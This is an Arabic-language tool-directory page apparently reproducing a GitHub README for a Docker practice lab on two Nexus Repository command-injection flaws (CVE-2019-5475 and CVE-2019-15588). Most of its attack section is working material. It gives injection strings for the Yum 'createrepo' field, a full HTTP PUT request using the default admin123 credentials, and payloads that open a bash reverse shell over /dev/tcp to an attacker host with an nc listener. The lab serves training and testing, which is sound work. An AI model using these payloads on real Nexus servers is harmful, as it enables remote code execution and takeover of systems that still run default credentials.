Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/exp-docs/cve-2019-5475
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubexp-docs/cve-2019-5475

CVE-2019-5475

CVE-2019-5475 ميدان تدريب: ثغرة حقن أوامر RCE

عرض المستودع
531منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-5475

CVE-2019-5475 و CVE-2019-15588 ميدان الاختبار: ثغرة حقن أوامر RCE


0x00 الخلفية

CVE-2019-5475 هي ثغرة حقن أوامر RCE في Nexus تتعلق بالمكون الإضافي المدمج Yum Repository، وقد تم الكشف عنها لأول مرة في hackerone، ولكن نظرًا لأن الإصلاح الرسمي الأول لم يكن كاملاً، فقد نتج عنها ثغرة CVE-2019-15588.

تتطلب كلتا الثغرتين تسجيل الدخول كمسؤول (admin) لاستغلالهما، ولكن كلمة مرور المسؤول الافتراضية لـ Nexus (admin123) غالبًا ما تُترك دون تغيير، مما يسهل استغلالها.

0x10 بيئة ميدان الاختبار

0x20 هيكل الدليل

root@kitploit:~
CVE-2019-5475
├── nexus-yum-core .......... [مشروع Maven للتصحيح: يحاكي إدخال createrepo أو mergerepo في واجهة Nexus الرسومية]
├── nexus ................... [دليل تحميل بيانات حاوية Nexus]
├── attacker ................ [دليل بناء جهاز المهاجم]
│   └── Dockerfile .......... [ملف بناء Docker لجهاز المهاجم]
├── docker-compose.yml ...... [تكوين بناء Docker]
├── imgs .................... [صور مساعدة لشرح README]
└── README.md ............... [ملف README هذا]

0x40 إعداد ميدان الاختبار

  • يجب أن يكون الجهاز المضيف مثبتًا عليه Docker و Docker-compose
  • قم بتنزيل هذا المستودع: git clone https://github.com/lyy289065406/CVE-2019-5475
  • افتح دليل بناء Nexus: cd CVE-2019-5475
  • قم ببناء وتشغيل Nexus: docker-compose up -d
  • بعد حوالي 5 دقائق، يمكن الوصول إلى Nexus من المتصفح (مصادقة أساسية admin/admin123)، حيث:
NexusCVEURL
2.14.9CVE-2019-5475http://127.0.0.1:8009/nexus
2.14.14CVE-2019-15588http://127.0.0.1:8014/nexus

تم أيضًا إعداد جهاز مهاجم 172.168.50.2 في نفس بيئة الشبكة مع الجهازين المستهدفين، ويُستخدم للتحقق من الصدفة العكسية.

0x50 【CVE-2019-5475】التحقق من ميدان الاختبار

0x51 PoC

استخدم admin لتسجيل الدخول إلى http://127.0.0.1:8009/nexus/#capabilities، وستجد نقطة حقن RCE في Administration -> Capabilities -> Yum: Configuration -> Settings.

يمكن حقن الأوامر في حقلي الإدخال Path of "createrepo" و Path of "mergerepo"، ويمكن مشاهدة نتائج التنفيذ من Status.

على سبيل المثال، عن طريق إدخال PoC bash -c id || python في نقطة حقن createrepo، يمكن الحصول على نتيجة تنفيذ الأمر bash -c id وهي uid=200(nexus) gid=200(nexus) groups=200(nexus) من Status.

يمكن اعتراض طلب PoC المقابل باستخدام BurpSuite كالتالي:

root@kitploit:~
PUT /nexus/service/siesta/capabilities/RANDOM_ID HTTP/1.1
Host: 127.0.0.1:8009
accept: application/json
Content-Type: application/json
Authorization: Basic YWRtaW46YWRtaW4xMjM=
Connection: close

{"typeId":"yum","enabled":true,"properties":[{"key":"createrepoPath","value":"bash -c id || python"}],"id":"RANDOM_ID"}

0x52 EXP

يمكن استغلال نقطة الحقن هذه بسهولة لإنشاء صدفة عكسية:

  • تسجيل الدخول إلى جهاز المهاجم: docker exec -it -u root docker_attacker /bin/bash
  • استخدام netcat للاستماع للصدفة العكسية: nc -lvvp 4444
  • في نقطة حقن createrepo المذكورة أعلاه، قم بإنشاء الحمولة: bash -c $@|bash 0 echo bash -i >&/dev/tcp/172.168.50.2/4444 0>&1 || python

0x60 【CVE-2019-15588】التحقق من ميدان الاختبار

0x61 PoC

موقع الحقن هو نفسه لـ CVE-2019-5475، مع تعديل PoC إلى: /bin/bash -c id || /createrepo

0x62 EXP

يمكن استغلال هذه الثغرة بنفس طريقة الحصول على صدفة عكسية:

  • تسجيل الدخول إلى جهاز المهاجم: docker exec -it -u root docker_attacker /bin/bash
  • استخدام netcat للاستماع للصدفة العكسية: nc -lvvp 4444
  • في نقطة حقن createrepo، قم بإنشاء الحمولة: /bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/172.168.50.2/4444 0>&1 || /createrepo

0x70 إصلاح الثغرات

  • بالنسبة لـ CVE-2019-5475: التصحيح الرسمي الأول
  • بالنسبة لـ CVE-2019-15588: التصحيح الرسمي الثاني

0x80 حول nexus-yum-core

nexus-yum-core هو جزء الكود الأساسي في Nexus المتعلق باستغلال هذه الثغرة، ويُستخدم بشكل أساسي لتحليل وتصحيح الحمولة المدخلة مباشرة من الخلفية، دون الحاجة إلى بناء خدمة Nexus كاملة من المصدر.

0x90 المراجع

  • https://paper.seebug.org/1260/
  • https://blog.spoock.com/2018/11/25/getshell-bypass-exec/
تنزيل الأداة